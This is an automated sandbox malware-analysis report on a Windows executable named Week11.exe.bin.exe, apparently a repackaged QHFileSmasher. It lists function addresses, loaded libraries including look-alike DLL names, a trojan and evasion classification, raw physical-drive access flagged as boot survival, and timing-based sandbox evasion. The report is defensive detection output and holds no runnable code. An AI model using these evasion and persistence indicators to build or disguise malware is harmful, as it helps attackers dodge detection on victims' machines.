    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040618E1_2_0040618E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004061941_2_00406194
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C19A1_2_0041C19A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040619F1_2_0040619F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004162461_2_00416246
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C21D1_2_0040C21D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041021F1_2_0041021F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C2231_2_0041C223
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004462201_2_00446220
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004102301_2_00410230
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C23F1_2_0041C23F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004162E61_2_004162E6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048C3701_2_0048C370
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004103011_2_00410301
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004063FC1_2_004063FC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00470440
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C465
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00416468
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C471
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00406413
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004784C0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C4CD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00402500
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041E5DC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C58F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004145A6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C5BD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00412670
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041667D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C603
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041E6D4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C6DA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004186DD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0049E6FC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00416776
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040C717
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004107D7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041C7A7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004147B3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00412870
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041283C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004188C3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004208F8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00414893
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0044A940
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004109E9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00418999
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00448A60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0044AA07
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0044AA09
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00408A24
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00414A30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004AAAB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041CB42
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00412B5A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00408B29
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00408B81
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00408B94
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00414C72
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00410CD0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041AD54
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00418D54
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004A2D76
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040CD2E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040CDFE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00414EC6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00416E88
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00416FA1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B062
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040D06A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041B00F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041F03F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040D0DB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041712E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004691E0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040F18F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004A32BA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041F3CA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004153D1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004613D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004153FB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004153B1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004153B6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004153BD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004113BC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041D440
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00499453
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00411417
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00473410
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040541D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00415424
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0048F5C2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004075EC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004115FF
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040D59F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041F640
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B642
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407661
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407606
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00439610
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B632
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004116F1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004156F5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004136FC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00415682
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041568F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00411691
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004156A2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004076A7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B770
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407730
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B734
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004057D3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004117D9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B7E2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004A37FE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00415787
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004A579C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B79F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405845
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00411867
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407875
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040F810
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004058F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004078F4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407884
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041595B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B95B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00415962
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B966
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040596A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041197A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040B9D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407980
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041B99A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00411A42
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407A90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00495B44
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00411B60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405B7D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405B2C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405B3E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041FBE3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00415BF4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00417BA0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00425C40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00413C5E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041FC6A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041FC70
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00409C76
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405C7E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405C29
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040BC35
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00477C30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405CD5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041FC8D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405CB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405D31
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00423DC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040BDC6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040BDEA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405DF3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041FE60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040FE71
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00459E10
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00487EC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00405ECE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004A5E94
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0049BEA8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00477F30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00409FE3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0041DFF0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00407F81
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00413FB4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031CA200
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031D4100
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031FA012
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0320C070
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_03214690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031AA6A0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031CABB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_032169F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0321E870
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031CA860
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0321A8A0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_03220FC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031C8E40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0321EE80
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031DAEC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031B8DD0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0321AC10
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031C0CA0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031C93D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031AB250
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_03209270
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_03227270
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0320B100
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0321B1A0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031EB1F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031EF000
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_03207750
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0321B6D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031C5540
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031B1B70
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031B3BE0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031A7A30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_03219F60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031AFFE0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031E9E40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031E5E90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031C9C90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: String function: 031D3360 appears 168 times
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: String function: 031AFC50 appears 48 times
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: String function: 0048F134 appears 53 times
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: String function: 0042033F appears 117 times
    Source: Week11.exe.bin.exe | Static PE information: Resource name: UIDATA type: Zip archive data, at least v1.0 to extract, compression method=store
    Source: Week11.exe.bin.exe, 00000001.00000002.2485795081.000000000C180000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C072000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C16A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C060000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0B2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2485795081.000000000C19E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2485795081.000000000C192000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engine | Classification label: mal80.troj.evad.winEXE@1/1@0/6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00444920 CoCreateInstance
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00470440 FindResourceW,LoadResource,SizeofResource,FreeResource,_memset,LockResource,FreeResource
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | File created: C:\Users\user\AppData\Local\config
    Source: Week11.exe.bin.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Week11.exe.bin.exe | ReversingLabs: Detection: 36%
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | File read: C:\Users\user\Desktop\Week11.exe.bin.exe
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: wtsapi32.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: k7rn7l32.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: ntd3ll.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Section loaded: mswsock.dll
    Source: Week11.exe.bin.exe | Static file information: File size 8848896 > 1048576
    Source: Week11.exe.bin.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x790e00
    Source: Week11.exe.bin.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Week11.exe.bin.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Week11.exe.bin.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Week11.exe.bin.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Week11.exe.bin.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Week11.exe.bin.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Week11.exe.bin.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Week11.exe.bin.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: Week11.exe.bin.exe
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0043E2B0 SetErrorMode,ImmDisableIME,GetCommandLineW,CreateMutexW,GetLastError,CloseHandle,StrStrIW,StrStrIW,StrStrIW,FindWindowW,PostMessageW,FindWindowW,PostMessageW,CoInitialize,OleInitialize,LoadLibraryW,GetProcAddress,IsUserAnAdmin,StrStrIW,CloseHandle,DefWindowProcW,InitCommonControlsEx,OleUninitialize,CoUninitialize,CloseHandle,GetModuleHandleW,GetProcAddress
    Source: Week11.exe.bin.exe | Static PE information: real checksum: 0x128f7b should be: 0x870d47
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040E1B2 push es; retn 0000h | 1_2_0040E1B3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0040E4E7 push edi; retf | 1_2_0040E4E8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0048F016 push ecx; ret | 1_2_0048F029
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0048F179 push ecx; ret | 1_2_0048F18C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004758C0 push ecx; mov dword ptr [esp], 00000000h | 1_2_004758C1

    Persistence and Installation Behavior

    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 1_2_004776F9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 1_2_00477690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d | 1_2_004A97B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d | 1_2_004A9B70
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 1_2_004A9D00

    Boot Survival

    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 1_2_004776F9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 1_2_00477690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d | 1_2_004A97B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d | 1_2_004A9B70
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 1_2_004A9D00
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00484124 IsIconic,GetWindowPlacement,GetWindowRect
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: EnterCriticalSection,LeaveCriticalSection,_memset,GetModuleFileNameW,PathAppendW,PathAppendW,StrStrIW,PathAppendW,_memset,SHGetValueW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathAppendW,PathAppendW,_memset,SHGetValueW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,LeaveCriticalSection | 1_2_0044DC40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031FB880 rdtscp
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | API coverage: 0.3 %
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0046C990 FindFirstFileW
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0046D300 _memset,FindFirstFileW,FindNextFileW,FindNextFileW
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004479B0 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,PathIsDirectoryW,_memset,FindFirstFileW,InterlockedCompareExchange,Sleep,Sleep,FindNextFileW,FindClose,WaitForSingleObject,WaitForSingleObject,InterlockedCompareExchange,_memset,Sleep,Sleep,_memset,PathFileExistsW
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_00449B60 FindFirstFileW
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0046DE90 GetLogicalDriveStringsW,GetLogicalDriveStringsW,_memset,GetLogicalDriveStringsW,_wcsnlen,_wcsnlen
